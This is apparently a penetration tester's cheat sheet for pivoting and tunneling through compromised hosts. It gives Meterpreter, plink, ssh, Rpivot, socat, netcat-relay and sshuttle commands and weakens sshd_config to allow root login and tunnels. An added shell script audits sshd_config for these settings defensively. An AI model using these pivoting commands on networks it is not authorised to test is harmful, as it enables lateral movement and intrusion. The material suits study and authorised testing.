Pivoting / tunneling

Local port forward

portfwd add -l <lport> -p <rport> -r <ip_target>
plink -l root -pw pass -R <lport>:127.0.0.1:<lport> <ip_target> -P <port> -N
ssh -D <lport> -p <rport> <ip_target>

Remote port forward

Rpivot

Listener (attacker)

python server.py --proxy-port <1080> --server-port <80> --server-ip <ip>

Target machine

python client.py --server-ip <ip> --server-port <80>

Proxy SOCKS

use auxiliary/server/socks4a
run -j
route add <ip/range> <session>

Then use proxychains (full TCP connections only)
ssh -D 127.0.0.1:1080 -i <key> <user>@<target_ip>

2 Hops

https://medium.com/@petergombos/smb-named-pipe-pivoting-in-meterpreter-462580fd41c5

Tunneling

SSH tunneling

SSH when the login shell is /bin/false
Works with socks4/5

plink.exe -v -N -D localhost:<lport> <user>@<ip_target>
In Burp: SOCKS proxy at localhost:<lport>

VPN over SSH (not tested)

/etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yes

ssh <user>@<ip> -w any:any
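
Added example, not part of the original cheat sheet: a defender-side audit of the sshd_config settings that the SSH tunnels above depend on (PermitTunnel for ssh -w, AllowTcpForwarding for -L/-R/-D). The function name audit_sshd_config and the sample config are constructed for illustration; keyword defaults are assumed to be those of current OpenSSH.

```shell
#!/bin/sh
# Added example (not from the original page). Reads an sshd_config on stdin and
# reports the settings that permit the SSH tunnels listed on this page.
# Assumption: absent keywords use the defaults documented in sshd_config(5).
audit_sshd_config() {
    awk '
    function flag(k, msg) { print "FINDING " k "=" val[k] ": " msg; n++ }
    BEGIN {
        val["permittunnel"] = "no"
        val["allowtcpforwarding"] = "yes"
        val["gatewayports"] = "no"
        val["permitrootlogin"] = "prohibit-password"
    }
    /^[ \t]*(#|$)/ { next }               # comments and blank lines
    {
        sub(/[ \t]*=[ \t]*/, " ")         # accept the Keyword=value form
        key = tolower($1); v = tolower($2)
        gsub(/"/, "", v)                  # values may be quoted
        if (key == "match") { in_match = 1; next }
        if (!(key in val)) next
        if (in_match) {                   # conditional override: report, do not merge
            print "REVIEW match-block " key "=" v; next
        }
        # sshd keeps the first value it reads for a keyword; later ones are ignored.
        if (!(key in seen)) { seen[key] = 1; val[key] = v }
    }
    END {
        if (val["permittunnel"] != "no") flag("permittunnel", "ssh -w tun/tap tunnels allowed")
        if (val["allowtcpforwarding"] != "no") flag("allowtcpforwarding", "ssh -L/-R/-D forwarding allowed")
        if (val["gatewayports"] != "no") flag("gatewayports", "remote forwards may bind non-loopback addresses")
        if (val["permitrootlogin"] == "yes") flag("permitrootlogin", "root login with a password permitted")
        exit (n > 0)                      # non-zero status when anything was flagged
    }'
}

# Constructed sample: the two lines this page sets, a later duplicate that sshd
# would ignore, and TCP forwarding switched off.
audit_sshd_config <<'EOF' || true
PermitRootLogin yes
PermitTunnel yes
PermitTunnel no
AllowTcpForwarding no
EOF
```

On a live host, the output of sshd -T (the effective configuration) can be piped into the function instead of the raw file.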

Encapsulate UDP in TCP stream (not tested)

socat -v UDP-LISTEN:<4444>,fork TCP:localhost:<4444>

Bypass DPI (not tested)

http_tunnel
stunnel

Netcat Relay

mknod backpipe p
nc -lp <inbound_port> 0<backpipe | nc 127.0.0.1 22 1>backpipe
ssh <login>@<target_machine> -p <inbound_port>

sshuttle

sshuttle -r <username>@<sshserver> <0.0.0.0/0>